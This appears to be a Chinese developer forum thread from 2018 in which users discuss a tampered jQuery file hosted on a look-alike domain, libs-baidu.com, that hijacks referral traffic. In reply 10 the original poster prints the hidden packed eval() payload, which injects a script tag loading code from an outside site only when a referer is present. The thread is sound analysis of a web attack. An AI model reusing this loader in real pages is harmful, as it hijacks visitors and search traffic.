做法很高明呀,只有在外站链入到站点的时候才会发生跳转,搜索引擎的所有链入链接也都被劫持走了。直接访问网站却看不出丝毫问题。 这相似的链接.... 排查了 10 分钟才找出来!
1
ues 2018-10-05 11:54:50 +08:00 via Android
安全浏览器应该提示风险
|
2
zjsxwc 2018-10-05 12:38:10 +08:00
公用的 js 也投毒, 233333333333
不过域名是百度的,没准它就是不想别人免费用它的 js 也说不定 |
3
azh7138m 2018-10-05 12:53:03 +08:00
|
4
dot2017 2018-10-05 12:57:42 +08:00
baidu555556666.oss-cn-hongkong/aliyuncs/com
哪位大佬 DD 一下让他的 OSS 账单撑爆掉😊 |
5
23f0baf3 2018-10-05 12:59:35 +08:00
@zjsxwc 那个域名是 libs-baidu.com ,个人注册的,估计是个做黑厂的。whois 信息:
Name:zhengxianbang Organization:zhengxianbang Street:yongjiaxian,yongjiaxian,kunyangxiang,zhengshancun City:beijing State:zhejiangsheng Postal Code:325100 Country:CN Phone:+86.57788888888 Fax:+86.57788888888 Email:[email protected] |
6
emCupid 2018-10-05 15:42:56 +08:00
唉,提速降费是惠民了,位是运营商劫持也更变本加厉了
|
7
flowfire 2018-10-05 15:52:04 +08:00 via iPhone
https 怎么劫持?
|
8
sunsulei 2018-10-05 16:12:28 +08:00 via iPhone
只看到域名不一样 并没发现什么劫持,跳转等其他不妥
|
9
changwei 2018-10-06 01:16:30 +08:00
同樓上,就這麼一點點截圖,除了域名不同以外,沒看出來這兩個代碼有什麼問題。雖然我知道他這樣做肯定有問題。
|
10
TrustOcean OP @flowfire
@sunsulei @changwei 通过 tool.lu/js 的解码: 前者 JQ 脚本多出了一段加密后的 JS eval(function(p, a, c, k, e, d) { e = function(c) { return (c < a ? "" : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36)) }; if (!''.replace(/^/, String)) { while (c--) d[e(c)] = k[c] || e(c); k = [function(e) { return d[e] }]; e = function() { return '\\w+' }; c = 1; }; while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]); return p; }('4.5("<0 6=\\\'1/2\\\' 3=\\\'7://b.c.d/8?9=a\\\'></0>");', 14, 14, 'script|text|javascript|src|document|writeln|type|https|safe|lx|lhc|www|05fu|com'.split('|'), 0, {})) 这一段引用了一个外站的跳转代码。 PS:只有当附带 refer 的情况下才会 GET 到真实跳转代码,否则报 404. |
13
sunsulei 2018-10-06 23:55:46 +08:00 via iPhone
@TrustOcean 看不懂。。。不过也没必要看懂,冲着这个域名基本上就不是正常玩法
|
15
franklinyu 2018-10-07 08:26:37 +08:00
完全另一個域名 libs-baidu.com ,不用不就完了
|
16
huasec 2019-03-20 19:36:24 +08:00
我的代码那么简单,都看不出来,真笨!
|